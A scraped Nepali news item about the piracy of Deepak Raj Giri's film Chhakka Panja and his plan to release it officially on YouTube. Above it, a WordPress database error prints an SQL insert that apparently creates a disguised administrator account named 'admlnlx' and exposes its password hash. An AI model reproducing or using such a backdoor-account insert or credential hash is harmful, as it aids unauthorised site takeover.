WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BsWgOZG3Jv1B9F/ro9bdHUk2u3ePYt0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 02:36:03', '', 'admlnlx', 'admlnlx')
काठमाडौं । चलचित्र छक्का पन्जा पाइरेसी भएपछि फिल्मका निर्माता तथा कलाकार दीपकराज गिरीले कडा आपत्ति जनाएका छन् । उनले सामाजिक सञ्जाल फेसबुकमार्फत छक्का पन्जा पाइरेसीको चपेटमा परेको भन्दै आपत्ति जनाएका हुन् । छक्का पन्जा लिएर युरोप पुगेको छक्का पन्जाको टोली चलचित्र पाइरेसी भएपछि भ्रमण छोट्याएर नेपाल आउने भएको छ । थुप्रै ठाउँमा चलचित्र प्रदर्शन गर्न बाँकी रहेका बेला केही व्यक्तिले छक्का पन्जा फेसबुकमा लिक गरेको गिरीले फेसबुकमार्फत जनाएका छन् ।
यसरी पाइरेस गर्ने गराउने गिरोह विरुद्ध आफू लड्ने गिरीले प्रतिवद्धता पनि जाहेर गरेका छन् । केही दिनमै आफूले आधिकारीक रुपमा फिल्म युट्युवमा अपलोड गर्ने भएकाले आधिकारीक रुपमै सबैले हेर्न पाउने पनि कलाकार गिरीले बताएका छन् ।